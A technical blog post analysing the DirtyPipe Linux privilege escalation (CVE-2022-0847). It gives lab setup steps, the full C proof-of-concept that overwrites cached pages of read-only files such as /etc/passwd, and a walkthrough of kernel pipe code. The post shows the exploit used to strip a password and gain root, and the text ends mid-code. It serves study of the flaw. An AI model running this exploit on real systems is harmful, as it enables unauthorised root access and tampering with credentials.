The Da Vinci of DirtyPipe Local Privilege Escalation: CVE-2022-0847

23 min read · Sep 1, 2023

We will dive deep into the DirtyPipe vulnerability, look at pipes inside the kernel, learn more about the ring buffer, read and write, and see how all the magic works! 🧙‍♂️

Description

Introduction

Before you start: this is me explaining this, so you need to get ready 😅

The public description is as follows:

A flaw was found in the way the “flags” member of the new pipe buffer structure was lacking proper initialization in copy_page_to_iter_pipe and push_pipe functions in the Linux kernel and could thus contain stale values. An unprivileged local user could use this flaw to write to pages in the page cache backed by read only files and as such escalate their privileges on the system.

Background Story

One important note for reading this blog: I jumped back and forth between points to understand the vulnerability fully. I believe this is the best way to convey the mindset behind the analysis, but I will establish a flow to make it understandable.

I have this habit of reading as much as I can about a CVE if any resources exist

Easy LPEs are always interesting to me. Understanding how one executable can run and hand out new permissions makes me really curious. Also, DirtyCow is the ancestor of DirtyPipe.

The DirtyPipe room on TryHackMe explains the vulnerability quickly and simply:

https://tryhackme.com/room/dirtypipe

I needed to dive in a little deeper to build my own understanding.

My plan for this analysis is as follows:

Build the testing lab
Reproduce the vulnerability
Explain why & how this vulnerability happens
Explain what happens when we open a file, just to understand some terms
Explain how pipe works and dig in the kernel code
Explain the exploit code
Debugging (this is not kernel debugging)
Mitigation

How does the vulnerability work, in simple terms?

After I finished the blog, I went back to write this. This is how I imagine this whole thing

There is a function that creates a pipe named prepare_pipe
There is another function called main, main will call the prepare_pipe function
The way to create the pipe is as follows:
create the pipe
fill the pipe with data using a loop to write the data to that pipe, the writing happens using a function named pipe_write
If you fill the pipe in a specific way, pipe_write sets a flag named PIPE_BUF_FLAG_CAN_MERGE on each buffer, which allows a later write to be appended to that buffer's page instead of going into a new buffer.
Now, since the buffers are ready and the flag is set, we need to empty the buffers so we can use our own data.
To drain (empty) the pipe, you read the data; that happens INSIDE the kernel in a function named pipe_read.
After that, the splice system call is made, which calls the do_splice function.
The job of splice is to transfer data between the file descriptor and the pipe. It doesn’t really transfer the data so much as set a reference that points the pipe at the page where the data is already loaded in memory.
do_splice, which lives in splice.c, eventually reaches copy_page_to_iter, and copy_page_to_iter calls copy_page_to_iter_pipe.
During this whole process, nothing initializes the flags again, so PIPE_BUF_FLAG_CAN_MERGE is still set.
Now, in the exploit code, splice copies one byte from the target file (/etc/passwd) into the pipe. This is where the next write comes into play: it modifies the page referenced by the splice.
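To see the splice step in isolation, here is a small, harmless sketch that splices a single byte from a regular file into a pipe and reads it back. The helper names (splice_one_byte, demo_splice_byte) and the scratch file under /tmp are my own assumptions for illustration; they are not part of the exploit.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>

/* Splice exactly one byte, located at `offset` in `path`, into a fresh
 * pipe and read it back. Returns the byte (0..255) or -1 on error. */
int splice_one_byte(const char *path, off_t offset)
{
    int result = -1;
    int p[2];

    assert(offset >= 0);
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;
    if (pipe(p) == 0) {
        loff_t off = offset;
        /* No user-space buffer is involved here: the pipe ends up
         * referencing the page that already holds the file data. */
        if (splice(fd, &off, p[1], NULL, 1, 0) == 1) {
            unsigned char c;
            if (read(p[0], &c, 1) == 1)
                result = c;
        }
        close(p[0]);
        close(p[1]);
    }
    close(fd);
    return result;
}

/* Hypothetical helper: create a scratch file holding "ABCDEF" and
 * splice the byte at offset 2 out of it. */
int demo_splice_byte(void)
{
    char path[] = "/tmp/splice_demo_XXXXXX";
    int fd = mkstemp(path);
    if (fd < 0)
        return -1;
    ssize_t w = write(fd, "ABCDEF", 6);
    close(fd);
    int c = (w == 6) ? splice_one_byte(path, 2) : -1;
    unlink(path);
    return c;
}
```

Calling demo_splice_byte() should hand back the third byte of the scratch file. On a patched kernel this is all splice does; the problem described above only appears when a stale flag is left on the pipe buffer.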

Build the lab

Dirty Pipe has been fixed in Linux kernel versions 5.16.11, 5.15.25, and 5.10.102, and I have been working on another kernel vulnerability so I already had kernel 5.9.8 version running.

There are two methods to change the Linux kernel of a distro that I’m aware of

Using a tool such as Mainline Kernels which we will be using here.
Download the kernel code, compile and set some settings, update the grub, and reboot. I have another blog in the pipeline about this method

For this CVE, I’m using Ubuntu Desktop 22.04.2.

You can use mainline as a CLI tool or as a GUI. For the CLI version, you can follow the instructions in the repo here:

https://github.com/pimlie/ubuntu-mainline-kernel.sh

To install the GUI version you can follow the instructions below:

sudo add-apt-repository ppa:cappelikan/ppa
sudo apt update
sudo apt install mainline

Once it’s downloaded, search for it here:

Open it, it will take a minute until it updates and it will look like this

You will see something like this, and this is the currently running kernel (in my case I’m running another version, so it says installed)

From the list of kernel versions, pick one that’s vulnerable; in my case I’m using 5.9.8.

Click on the kernel version and after that install

Once it’s done, it will say installed

Now you can exit, and reboot your machine.

While the system is rebooting, you have to enter the boot menu

If you are using Virtualbox, you have to enter the box while it’s rebooting and when you see the Vbox logo, you have to press SHIFT

Enter “Advanced options for Ubuntu”

Choose the kernel and Enter

Behold, here is the mighty LPE passing by

Download the exploit from here:

git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git

You have to compile the exploit.

If you don’t have the gcc you need to install it

sudo apt install -y gcc

Now make the compile.sh executable and run it

chmod +x compile.sh
./compile.sh

Run ./exploit-1

How this vulnerability happens

Based on what was already published and written about this vulnerability, it’s really simple

In simple terms it goes as follows:

You have a file (e.g. /etc/passwd) that you are allowed to read (read-only access is enough).
Once this file is opened and read, its data is loaded into memory pages (the page cache).
We abuse a pipe to overwrite the loaded data in the memory page, for example to edit a specific user's entry.
Now, if you have overwritten root's password in memory and you want to log in as root, the system goes to memory to get the data. Why? Because going to the file every time would be wasteful, so the kernel serves the data from the page cache. That cached data is exactly what we overwrote, which means our new password is accepted. VOILÀ!

NOTE: This vulnerability OVERWRITES data in the page cache, which means it can overwrite anything there: replace the password, change the user, or even remove the password 😁. It also means that once the page is dropped from the page cache and has to be fetched from the file (/etc/passwd) again, you lose your new password or whatever alteration you made.

I explained different exploits to show different scenarios.

But it’s not that simple

Just to explain a little bit more in detail how the opening of a file works

When a process in the userland (user-space) attempts to open a file, the Linux kernel performs several steps to make the file data accessible to the process.

Here’s a more detailed explanation of the process:

File Descriptor: The process invokes the open() system call to open a file. This system call returns a file descriptor, which is an integer representing the opened file in the process’s file descriptor table.

File Metadata: The kernel retrieves the file’s metadata, such as the file size, permissions, and location, from the file system. This metadata is stored in data structures associated with the opened file.

Memory Pages: The kernel prepares memory pages to hold the file data. A memory page is a fixed-size block of memory managed by the operating system.

Page Cache: If the file data is not already in the kernel’s page cache, the kernel loads the required pages from the file system into the page cache. The page cache is a cache of recently accessed file data that resides in the kernel’s memory.
Memory Mapping: The kernel establishes a mapping between the file data in the page cache and the virtual address space of the userland process. This mapping allows the process to access the file data as if it were part of its own memory.
Copying Data to User-Space: One approach to providing userland access is to copy the file data from the page cache into the user-space memory allocated for the process. The kernel utilizes memory copy operations, such as copy_to_user(), to copy the data.
Direct Userland Access: Another approach is to keep the file data in kernel-space but provide userland access to it through system calls. Special functions, such as read() or mmap(), are used to interact with the kernel and retrieve or manipulate the file data.
read() System Call: The process can read the file data by invoking the read() system call, which copies the requested data from the kernel-space buffer to the user-space buffer provided by the process.
mmap() System Call: The process can also map the file directly into its address space using the mmap() system call. This establishes a mapping between the file data in the kernel-space page cache and the process's virtual memory, allowing the process to access the file data through regular memory operations.

In our case it’s the second approach. More generally, the choice between copying the file data into user-space and providing direct access through system calls depends on various factors, such as performance considerations, memory usage, and the specific requirements of the application.
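As a rough illustration of the two access paths described above, the sketch below reads the first byte of a file once with read() and once with mmap(). The function names and the scratch file are assumptions made up for this example; both paths are served from the same cached file data.

```c
#include <assert.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>

/* First byte of the file obtained with read(): the kernel copies it
 * from the page cache into our buffer. Returns -1 on error. */
int first_byte_via_read(const char *path)
{
    unsigned char c;

    assert(path != NULL);
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;
    ssize_t n = read(fd, &c, 1);
    close(fd);
    return n == 1 ? c : -1;
}

/* First byte obtained with mmap(): the cached page is mapped into our
 * address space and read like ordinary memory. Returns -1 on error. */
int first_byte_via_mmap(const char *path)
{
    assert(path != NULL);
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;
    unsigned char *m = mmap(NULL, 1, PROT_READ, MAP_PRIVATE, fd, 0);
    close(fd);                  /* the mapping stays valid after close() */
    if (m == MAP_FAILED)
        return -1;
    int c = m[0];
    munmap(m, 1);
    return c;
}

/* Hypothetical helper: write a scratch file and compare both paths.
 * Returns 1 when read() and mmap() agree on the first byte. */
int demo_read_vs_mmap(void)
{
    char path[] = "/tmp/pagecache_demo_XXXXXX";
    int fd = mkstemp(path);
    if (fd < 0)
        return 0;
    ssize_t w = write(fd, "root:x:0:0", 10);
    close(fd);
    int ok = (w == 10) &&
             first_byte_via_read(path) == 'r' &&
             first_byte_via_mmap(path) == 'r';
    unlink(path);
    return ok;
}
```

Because every reader goes through the same cached pages, a change made to a cached page is visible to all of them, which is why an overwrite in the page cache matters so much.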

What is pipe and How it works?

A lot of us are familiar with the | pipe, as we use it a lot on *nix and Windows systems.
But this is what is called an "anonymous pipe":

An anonymous pipe is a simplex FIFO communication channel that may be used for one-way interprocess communication. An implementation is often integrated into the operating system’s file IO subsystem. (Wikipedia)

I checked the manual (man) of pipe and here is what I found, and it makes a lot of sense especially when we read the code of the exploit.

pipe() creates a pipe, a unidirectional data channel that can be used for interprocess communication.

The array pipefd is used to return two file descriptors referring to the ends of the pipe.

pipefd[0] refers to the read end of the pipe. pipefd[1] refers to the write end of the pipe.

Data written to the write end of the pipe is buffered by the kernel until it is read from the read
end of the pipe. For further details, see pipe(7).

The links for pipe and pipe(7) are in the resources; I would recommend going through both.

I go more in-depth about how pipe works in the "Going to pipe.c" section.
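A minimal sketch of the man page description, assuming nothing beyond pipe(), write(), and read(): data goes into pipefd[1], is buffered by the kernel, and comes out of pipefd[0]. The function name pipe_roundtrip_ok is hypothetical.

```c
#include <assert.h>
#include <string.h>
#include <unistd.h>

/* Write `msg` into the write end of a new pipe and read it back from
 * the read end. Returns 1 if the bytes come out unchanged. */
int pipe_roundtrip_ok(const char *msg)
{
    char out[64];
    size_t len = strlen(msg);
    int p[2];

    assert(len > 0 && len <= sizeof(out));    /* keep the demo tiny */
    if (pipe(p) != 0)
        return 0;

    ssize_t w = write(p[1], msg, len);         /* buffered by the kernel */
    ssize_t r = (w == (ssize_t)len) ? read(p[0], out, sizeof(out)) : -1;

    close(p[0]);
    close(p[1]);
    return r == (ssize_t)len && memcmp(out, msg, len) == 0;
}
```

For example, pipe_roundtrip_ok("hello") sends five bytes through the kernel buffer and checks that they arrive intact.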

Explaining the exploit code

Code Review

I wanted to understand how the pipe is used from a code review first, and to do things a bit more manually before moving on to dynamic or interactive debugging. So I found another PoC where I supply the target file, the offset, and the data myself.

By the way, this is basically the same code we used in the vulnerability reproduction section; thanks to whoever edited the code and made it more manual.

Let’s dive into the exploit code; a lot of the explanation is already in the comments.

It starts with including the headers and defining some constants:

#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>
#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif

Next part here

Initialize the pipe by creating it and filling it.
Filling the pipe sets the PIPE_BUF_FLAG_CAN_MERGE flag on each pipe_buffer.
After filling the pipe, drain it.
Finally, as the comment says, the pipe is now empty, and if somebody adds a new pipe_buffer without initializing its “flags”, the buffer will be mergeable.
What’s interesting to me here is: why fill it and then drain it?! It doesn’t seem to make sense at first!

/**
 * Create a pipe where all "bufs" on the pipe_inode_info ring have the
 * PIPE_BUF_FLAG_CAN_MERGE flag set.
 */
static void prepare_pipe(int p[2])
{
    if (pipe(p)) abort();
    const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
    static char buffer[4096];
    /* fill the pipe completely; each pipe_buffer will now have
       the PIPE_BUF_FLAG_CAN_MERGE flag */
    for (unsigned r = pipe_size; r > 0;) {
        unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
        write(p[1], buffer, n);
        r -= n;
    }
    /* drain the pipe, freeing all pipe_buffer instances (but
       leaving the flags initialized) */
    for (unsigned r = pipe_size; r > 0;) {
        unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
        read(p[0], buffer, n);
        r -= n;
    }
    /* the pipe is now empty, and if somebody adds a new
       pipe_buffer without initializing its "flags", the buffer
       will be mergeable */
}

Let me explain the code in more detail first; after that I will go through the kernel code, which is where I understood the why.

if (pipe(p)) abort(); : This line creates a new pipe with two file descriptors, one for reading (p[0]) and one for writing (p[1]). If the pipe() call fails, the program aborts immediately.
const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);: This line retrieves the size of the pipe buffer by calling fcntl with the file descriptor p[1] (the writing end of the pipe) and the command F_GETPIPE_SZ. The size is stored in the variable pipe_size.
https://man7.org/linux/man-pages/man2/fcntl.2.html

static char buffer[4096];: A static character array (buffer) of size 4096 bytes (4 KB) is declared. This buffer will be used to fill and drain the pipe.
Fill the pipe: The code proceeds to fill the pipe completely to initialize the flags for each pipe_buffer instance in the pipe. The pipe is filled using the write system call in chunks of sizeof(buffer) bytes until the entire pipe is filled. This step ensures that each pipe_buffer instance will have the PIPE_BUF_FLAG_CAN_MERGE flag initialized.
Drain the pipe: After filling the pipe, the code then proceeds to drain the pipe using the read system call in chunks of sizeof(buffer) bytes. This step does not affect the PIPE_BUF_FLAG_CAN_MERGE flag; it merely empties the pipe of any data that was previously written.
Flag representation: The flag being set in this code is PIPE_BUF_FLAG_CAN_MERGE. It marks a pipe_buffer as mergeable, meaning that a later write may append its data to the page that buffer already points to instead of allocating a new buffer.
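The fill and drain steps can be observed from user space without touching anything sensitive. The sketch below is an assumption-laden variant of prepare_pipe, not the PoC itself: it switches the pipe to non-blocking mode, writes until the kernel refuses more data, drains everything, and then asks the kernel via FIONREAD how many bytes are still queued. The function names are hypothetical.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <unistd.h>

/* Capacity of a fresh pipe in bytes, as reported by F_GETPIPE_SZ
 * (-1 on error). */
long pipe_capacity_bytes(void)
{
    int p[2];
    if (pipe(p) != 0)
        return -1;
    long size = fcntl(p[1], F_GETPIPE_SZ);
    close(p[0]);
    close(p[1]);
    return size;
}

/* Fill a pipe until the kernel refuses more data, drain it again, and
 * return how many bytes are still queued afterwards (-1 on error). */
int bytes_left_after_fill_and_drain(void)
{
    static char buffer[4096];
    int p[2], queued = -1;

    if (pipe(p) != 0)
        return -1;
    /* Non-blocking mode, so a full or empty pipe makes write()/read()
     * fail with EAGAIN instead of putting the demo to sleep. */
    fcntl(p[0], F_SETFL, O_NONBLOCK);
    fcntl(p[1], F_SETFL, O_NONBLOCK);

    long written = 0, drained = 0;
    ssize_t n;
    while ((n = write(p[1], buffer, sizeof(buffer))) > 0)
        written += n;                   /* fill */
    while ((n = read(p[0], buffer, sizeof(buffer))) > 0)
        drained += n;                   /* drain */

    assert(written == drained);         /* everything written came back */
    if (ioctl(p[0], FIONREAD, &queued) != 0)
        queued = -1;
    close(p[0]);
    close(p[1]);
    return queued;
}
```

From user space the drained pipe looks completely empty. What cannot be seen from here is the point the PoC relies on: inside the kernel, the slots of the ring still carry the flags they were given while the pipe was being filled.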

Now let’s go to the next part of the code and explain it in a little detail; after that I will come back and explain some more things (just keep going back and forth) 😁

int main(int argc, char **argv)
{
    if (argc != 4) {
        fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);
        return EXIT_FAILURE;
    }
    /* dumb command-line argument parser */
    const char *const path = argv[1];
    loff_t offset = strtoul(argv[2], NULL, 0);
    const char *const data = argv[3];
    const size_t data_size = strlen(data);
    if (offset % PAGE_SIZE == 0) {
        fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
        return EXIT_FAILURE;
    }
    const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
    const loff_t end_offset = offset + (loff_t)data_size;
    if (end_offset > next_page) {
        fprintf(stderr, "Sorry, cannot write across a page boundary\n");
        return EXIT_FAILURE;
    }
    /* open the input file and validate the specified offset */
    const int fd = open(path, O_RDONLY); // yes, read-only! :-)
    if (fd < 0) {
        perror("open failed");
        return EXIT_FAILURE;
    }
    struct stat st;
    if (fstat(fd, &st)) {
        perror("stat failed");
        return EXIT_FAILURE;
    }
    if (offset > st.st_size) {
        fprintf(stderr, "Offset is not inside the file\n");
        return EXIT_FAILURE;
    }
    if (end_offset > st.st_size) {
        fprintf(stderr, "Sorry, cannot enlarge the file\n");
        return EXIT_FAILURE;
    }
    /* create the pipe with all flags initialized with
       PIPE_BUF_FLAG_CAN_MERGE */
    int p[2];
    prepare_pipe(p);
    /* splice one byte from before the specified offset into the
       pipe; this will add a reference to the page cache, but
       since copy_page_to_iter_pipe() does not initialize the
       "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
    --offset;
    ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
    if (nbytes < 0) {
        perror("splice failed");
        return EXIT_FAILURE;
    }
    if (nbytes == 0) {
        fprintf(stderr, "short splice\n");
        return EXIT_FAILURE;
    }
    /* the following write will not create a new pipe_buffer, but
       will instead write into the page cache, because of the
       PIPE_BUF_FLAG_CAN_MERGE flag */
    nbytes = write(p[1], data, data_size);
    if (nbytes < 0) {
        perror("write failed");
        return EXIT_FAILURE;
    }
    if ((size_t)nbytes < data_size) {
        fprintf(stderr, "short write\n");
        return EXIT_FAILURE;
    }
    printf("It worked!\n");
    return EXIT_SUCCESS;
}

Command-line argument parsing: The program receives the target file name (TARGETFILE), the starting offset where data will be written (OFFSET), and the data to be written (DATA) as command-line arguments.
Checking alignment: The code checks whether the specified OFFSET is aligned with the page size (PAGE_SIZE). If it is, the program prints an error message and exits, because the exploit first splices the byte just before OFFSET into the pipe, and that byte has to live on the same page as the data being overwritten.
Boundary check: The code calculates the next page boundary (next_page) after the OFFSET and checks if the end offset (end_offset) of the data being written extends beyond the next page boundary. If it does, the program prints an error message and exits to prevent writing across a page boundary.
Opening the input file: The program opens the input file in read-only mode using the open system call and retrieves its size using fstat. It performs checks to ensure that the specified OFFSET and end_offset are within the file size.
https://man7.org/linux/man-pages/man3/fstat.3p.html

Creating the pipe: The program creates a pipe with two file descriptors using the prepare_pipe function that we explained before. This pipe is what will later hold a reference to the target file's page in the page cache.
Splicing a byte: Before writing the actual data, the code performs a splice operation. It reads one byte from the file at the position before the specified OFFSET and writes it into the pipe. This operation adds a reference to the page cache, but because the copy_page_to_iter_pipe() function does not initialize the "flags," the PIPE_BUF_FLAG_CAN_MERGE flag remains set.
https://man7.org/linux/man-pages/man2/splice.2.html

Writing data to the page cache: The program then writes the new data (DATA) into the pipe. Because the PIPE_BUF_FLAG_CAN_MERGE flag is still set on the pipe buffer that references the page cache, the write does not create a new pipe buffer; it appends the data to that buffer's page, which is the cached page of the target file. This merge is the bug being exploited: the data lands in the page cache of a file we only opened for reading.
Completion and success message: If everything works as expected, the program prints “It worked!” to indicate that the data has been overwritten in the cached copy of the file.
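The alignment, boundary, and file-size checks described above are plain arithmetic, so they can be tried on their own. The sketch below repackages them into one function; the name check_target_range, the status enum, and the fixed 4 KiB page size are assumptions made for this example.

```c
#include <assert.h>
#include <stddef.h>

#define DEMO_PAGE_SIZE 4096L    /* assumption: 4 KiB pages */

enum range_status {
    RANGE_OK = 0,
    RANGE_AT_PAGE_START = -1,   /* no byte before OFFSET on this page */
    RANGE_CROSSES_PAGE = -2,    /* data would spill into the next page */
    RANGE_OUTSIDE_FILE = -3     /* data would start or end past EOF */
};

/* Mirror of the PoC's sanity checks on OFFSET and DATA length. */
enum range_status check_target_range(long offset, size_t len, long file_size)
{
    assert(offset >= 0 && file_size >= 0);

    if (offset % DEMO_PAGE_SIZE == 0)
        return RANGE_AT_PAGE_START;

    /* Round offset up to the start of the following page. */
    long next_page = (offset | (DEMO_PAGE_SIZE - 1)) + 1;
    long end_offset = offset + (long)len;
    if (end_offset > next_page)
        return RANGE_CROSSES_PAGE;

    if (offset > file_size || end_offset > file_size)
        return RANGE_OUTSIDE_FILE;

    return RANGE_OK;
}
```

For instance, offset 4090 with 10 bytes of data ends at 4100, which is past the page boundary at 4096, so it is rejected, while offset 4090 with 6 bytes ends exactly at the boundary and is accepted.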

Let’s see something interesting 😃. Oh yeah, I forgot to tell you: this one won’t replace the password.

But here, if I just run the command su rtest, I will be root : D

Here, I was a little bit confused not because it changed the user, but because it removed the password.

You can notice it here

But you need to remember that it’s overwriting bytes, not changing something specific.
So it can overwrite whatever we want it to.

Here’s an illustration of how the overwriting happens

This is my mind after I understood this

Let me explain this in more detail, because from what I experienced while studying this vulnerability, the whole trick is in how to initialize the pipe and ab/use 😄 it to overwrite the data in the memory page.

Dive inside the kernel

Well, here I was even more curious about all of it! How is PIPE_BUF_FLAG_CAN_MERGE set? Why are we filling the pipe first? Why drain it again?! It doesn’t make much sense.

So, I read the whole pipe.c and splice.c and this was a really informative reading 😅

https://elixir.bootlin.com/linux/v5.9.8/C/ident/PIPE_BUF_FLAG_CAN_MERGE

Here we can see that the flag is defined as the bit flag 0x10.

Bit flags are a programming technique to represent multiple boolean values or multiple states into a single integer.
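A small sketch of the technique, with made-up names: DEMO_FLAG_CAN_MERGE reuses the 0x10 value mentioned above, while DEMO_FLAG_PACKET and its value are only there to have a second bit to play with.

```c
#include <assert.h>

/* Illustrative names: 0x10 is the value quoted above for
 * PIPE_BUF_FLAG_CAN_MERGE, the other value is only an example. */
#define DEMO_FLAG_PACKET    0x08u
#define DEMO_FLAG_CAN_MERGE 0x10u

/* Turn a bit on, leaving all other bits alone. */
unsigned set_flag(unsigned flags, unsigned bit)
{
    return flags | bit;
}

/* Turn a bit off, leaving all other bits alone. */
unsigned clear_flag(unsigned flags, unsigned bit)
{
    return flags & ~bit;
}

/* Test whether a bit is on; this is the same kind of check as
 * (buf->flags & PIPE_BUF_FLAG_CAN_MERGE) in the kernel. */
int has_flag(unsigned flags, unsigned bit)
{
    assert(bit != 0);
    return (flags & bit) != 0;
}
```

Each flag occupies its own bit, so one unsigned integer can carry several independent yes/no answers at once.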

https://elixir.bootlin.com/linux/v5.9.8/source/include/linux/pipe_fs_i.h#L11

After that, we got the struct of the pipe_buffer, which is really interesting because this is part of the idea behind filling the pipe, the PIPE_BUF_FLAG_CAN_MERGE will be set on the pipe_buffer

Going to pipe.c

https://elixir.bootlin.com/linux/v5.9.8/source/fs/pipe.c

I won’t be able to explain the full code of pipe.c, I mean c’mon there are 1431 lines of code and each function calls a lot of other functions : D

The most important parts for me here are the pipe_write and pipe_read functions.

pipe_write

The pipe_write function handles the process of writing data to a pipe. We will go over an overview of the steps of the pipe_write, and after that, I will go more in-depth with specific steps:

1. Initialization and Setup:

Extract the pipe_inode_info structure, which contains information about the pipe.
Define some initial variables.

struct pipe_inode_info *pipe = filp->private_data;
unsigned int head;
ssize_t ret = 0;
size_t total_len = iov_iter_count(from);

2. Handling Edge Cases:

If the data to be written (total_len) is zero (i.e., there's nothing to write), it simply returns 0.

if (unlikely(total_len == 0))
 	return 0;

3. Lock the Pipe:

Locks the pipe for synchronized access using __pipe_lock(pipe).

4. Check if Pipe has Readers:

If there are no readers on the other end of the pipe, it sends a SIGPIPE signal to the current process and returns an error (-EPIPE).

if (!pipe->readers) {
    send_sig(SIGPIPE, current, 0);
    ret = -EPIPE;
    goto out;
}

5. Merge Small Writes:

The kernel attempts to optimize small writes by merging them into an existing buffer (last buffer) if space permits.

head = pipe->head;
was_empty = pipe_empty(head, pipe->tail);
chars = total_len & (PAGE_SIZE-1);
if (chars && !was_empty) { ... }

6. Write Loop:

The main writing loop attempts to write data into the pipe’s buffers until either all data is written, or the pipe becomes full.
Each iteration checks the state of the pipe (e.g., if there are any readers), tries to allocate buffer space in the pipe’s ring buffer, and then copies data from the user’s space.
If the pipe becomes full and the writer is in non-blocking mode, it returns -EAGAIN. If a signal is pending, it returns -ERESTARTSYS. Otherwise, it waits for space to become available.

7. Wake Up:

If data was written to an empty pipe, any waiting readers are woken up, so they can start reading the data.

if (was_empty) {
   wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM); 
}

8. Unlock and Finalize:

The pipe is unlocked, and any final wake-up events are handled.
__pipe_unlock(pipe);

9. File Time Update:

If data was successfully written, the file’s time metadata is updated.
if (ret > 0 && sb_start_write_trylock(file_inode(filp)->i_sb)) { ... }

10. Return:

Finally, the function returns. The return value is either the number of bytes written or an error code.
return ret;
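Two of the error paths in this overview are easy to trigger from user space. The sketch below, with hypothetical function names, provokes the "no readers" case (step 4) and the "pipe is full in non-blocking mode" case (step 6) and returns the errno value that write() reports.

```c
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <unistd.h>

/* errno reported by write() when the pipe has no reader left. */
int errno_write_without_reader(void)
{
    int p[2], err = 0;
    if (pipe(p) != 0)
        return -1;
    /* Ignore SIGPIPE for the duration of the call so we can look at
     * the error code instead of being killed by the signal. */
    void (*old)(int) = signal(SIGPIPE, SIG_IGN);
    assert(old != SIG_ERR);
    close(p[0]);                        /* no readers any more */
    if (write(p[1], "x", 1) < 0)
        err = errno;
    signal(SIGPIPE, old);               /* restore previous handler */
    close(p[1]);
    return err;
}

/* errno reported by a non-blocking write() once the pipe is full. */
int errno_write_to_full_pipe(void)
{
    static char buffer[4096];
    int p[2], err;
    if (pipe(p) != 0)
        return -1;
    fcntl(p[1], F_SETFL, O_NONBLOCK);
    while (write(p[1], buffer, sizeof(buffer)) > 0)
        ;                               /* keep writing until refused */
    err = errno;                        /* set by the failed write() */
    close(p[0]);
    close(p[1]);
    return err;
}
```

The kernel returns -EPIPE and -EAGAIN internally; user space sees them as a return value of -1 with errno set to EPIPE or EAGAIN.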

Slide inside the pipe_write

Basically, the important parts are the Merge Small writes and the write loop.

    head = pipe->head;
    was_empty = pipe_empty(head, pipe->tail);
    chars = total_len & (PAGE_SIZE-1);
    if (chars && !was_empty) {
        unsigned int mask = pipe->ring_size - 1;
        struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
        int offset = buf->offset + buf->len;
        if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
            offset + chars <= PAGE_SIZE) {
            ret = pipe_buf_confirm(pipe, buf);
            if (ret)
                goto out;
            ret = copy_page_from_iter(buf->page, offset, chars, from);
            if (unlikely(ret < chars)) {
                ret = -EFAULT;
                goto out;
            }
            buf->len += ret;
            if (!iov_iter_count(from))
                goto out;
        }
    }

This part aims to use space efficiently: instead of allocating a new buffer for a small write, it appends the data to the last buffer when that is allowed.

Let’s delve into it piece by piece:

1. head = pipe->head;

This line gets the current head of the pipe (i.e., the position where new data will be written next).

2. was_empty = pipe_empty(head, pipe->tail);

This function checks if the pipe is currently empty by comparing the head and tail. It sets was_empty to true if the pipe is empty and false otherwise.

3. chars = total_len & (PAGE_SIZE-1);

This line calculates the remainder of total_len when divided by PAGE_SIZE using a bitwise AND operation. Essentially, it determines how many bytes are left over once the data has been split into full pages.
For instance, if total_len is 4100 and PAGE_SIZE is 4096, chars will be 4.

4. if (chars && !was_empty) { ... }

This block is only executed if there are remaining characters (bytes) that don’t fill a full page (chars is non-zero) and the pipe was not empty.

5. unsigned int mask = pipe->ring_size - 1;

This computes a mask for the ring buffer’s size. It’s used to wrap around the buffer index properly.

6. struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];

This gets the buffer that was written to most recently: the slot just before head, not the tail.

7. int offset = buf->offset + buf->len;

This computes where in the buffer the new data should be written. The offset is based on where the current data in the buffer ends.

8. Where the flag is checked: if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) && offset + chars <= PAGE_SIZE) { ... }
This block will be executed if:

The last buffer can have more data merged into it (PIPE_BUF_FLAG_CAN_MERGE).
Adding the new data to the current buffer won’t exceed the buffer’s size (PAGE_SIZE).

9. The rest of the code

ret = pipe_buf_confirm(pipe, buf);
This seems to confirm the buffer state. The exact behavior would depend on the implementation of pipe_buf_confirm, but it's likely a check or preparation for writing.
if (ret) goto out;
If pipe_buf_confirm returns a non-zero value, it jumps to the out label, typically indicating an error or a special condition.
ret = copy_page_from_iter(buf->page, offset, chars, from);
This line attempts to copy data from the iterator from into the buffer at the previously computed offset.
if (unlikely(ret < chars)) { ... }
This checks if the number of bytes copied is less than what was intended. If this happens, an error (EFAULT) is set and the function will eventually return.
buf->len += ret;
This updates the buffer's length to reflect the newly written data.
if (!iov_iter_count(from)) goto out;
If there's no more data left to write (as indicated by the iterator from being empty), the function will eventually return.
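The arithmetic in steps 3 to 8 can be replayed in user space. The sketch below is only a model of those expressions: the function names, the fixed 4 KiB page size, and the DEMO_ constants are assumptions for illustration, not kernel code.

```c
#include <assert.h>
#include <stddef.h>

#define DEMO_PAGE_SIZE      4096u   /* assumption: 4 KiB pages */
#define DEMO_FLAG_CAN_MERGE 0x10u   /* value of PIPE_BUF_FLAG_CAN_MERGE */

/* Step 3: bytes left over after the last full page,
 * i.e. total_len & (PAGE_SIZE-1). */
size_t tail_bytes(size_t total_len)
{
    return total_len & (DEMO_PAGE_SIZE - 1);
}

/* Steps 5 and 6: index of the most recently written slot,
 * i.e. (head - 1) & mask. The ring size must be a power of two
 * for the mask trick to work. */
unsigned last_slot(unsigned head, unsigned ring_size)
{
    assert(ring_size != 0 && (ring_size & (ring_size - 1)) == 0);
    return (head - 1) & (ring_size - 1);
}

/* Steps 7 and 8: the merge condition. `offset` and `len` describe the
 * data already in the buffer, `chars` is the amount to append. */
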